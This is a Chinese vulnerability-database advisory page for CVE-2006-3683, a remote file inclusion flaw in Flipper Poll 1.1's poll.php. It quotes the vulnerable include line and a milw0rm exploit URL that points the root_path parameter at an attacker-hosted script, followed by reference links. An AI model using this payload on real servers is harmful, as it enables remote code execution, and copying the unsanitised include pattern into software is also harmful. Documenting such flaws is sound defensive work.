Flipper Poll 'Poll.PHP'远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112160 漏洞类型 输入验证
发布时间 2007-02-02 更新时间 2007-02-02
CVE编号 CVE-2006-3683 CNNVD-ID CNNVD-200607-309
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/3253
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200607-309
|漏洞详情
FlipperPoll1.1及早期版本的poll.php存在PHP远程文件包含漏洞,远程攻击者可借助root_path参数中的URL执行任意PHP代码。
|漏洞EXP
Flipper Poll v1.1.0 (poll.php) remote file include vuln
---------------------------------------------------------------------------------
 
Found: Cyber-Security
cyber-security.org
 
---------------------------------------------------------------------------------
 
Script Download: http://sourceforge.net/project/showfiles.php?group_id=59828
 
---------------------------------------------------------------------------------

Vuln Code: include_once($root_path . 'config.php');
 
---------------------------------------------------------------------------------
 
Exploit: /poll.php?root_path=evilscripts?
 
---------------------------------------------------------------------------------
 
Reference: http://www.cyber-security.org/DataDetayAll.Asp?Data_id=596
 
---------------------------------------------------------------------------------

# milw0rm.com [2007-02-02]
|参考资料

来源:XF
名称:flipperpoll-poll-file-include(27203)
链接:http://xforce.iss.net/xforce/xfdb/27203
来源:BID
名称:18461
链接:http://www.securityfocus.com/bid/18461
来源:BUGTRAQ
名称:20060713FlipperPoll<=1.1.0RemoteFileInclusionVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/439971/100/0/threaded
来源:VUPEN
名称:ADV-2006-2353
链接:http://www.frsirt.com/english/advisories/2006/2353
来源:SECTRACK
名称:1016489
链接:http://securitytracker.com/id?1016489
来源:SECUNIA
名称:20632
链接:http://secunia.com/advisories/20632
来源:BUGTRAQ
名称:20060614FlipperPoll(root_path)RemoteFileInclusion
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=115031160401269&w=2
来源:OSVDB
名称:26503
链接:http://www.osvdb.org/26503
来源:MISC
链接:http://packetstormsecurity.org/0606-exploits/flipper.txt